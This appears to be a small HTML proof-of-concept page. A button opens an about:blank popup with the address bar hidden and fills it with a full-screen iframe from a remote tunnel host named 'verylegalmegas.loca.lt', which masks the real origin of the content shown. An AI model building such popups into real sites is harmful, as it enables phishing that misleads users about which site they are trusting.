<!DOCTYPE html>
<html lang="">
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    <header></header>
    <main>
        <button id="abc">Click this button to trigger</button>
    </main>
    <footer></footer>
    <script>
        document.getElementById('abc').addEventListener('click', () => {
            const wnd = window.open('about:blank', '_blank', 'status=no,toolbar=no,location=no,directories=no,resisable=yes,srollbars=yes,width=1050,height=600');
            wnd.document.write('<script>document.title = "Changing the title works because it is not inside the iframe";</scr' + 'ipt><iframe style="position: absolute;top: 0px;bottom: 0px;right: 0px;width: 100%;border: none;margin: 0;padding: 0;overflow: hidden;z-index: 9999;height: 100%;" src="https://verylegalmegas.loca.lt"></iframe>');
        });
    </script>
  </body>
</html>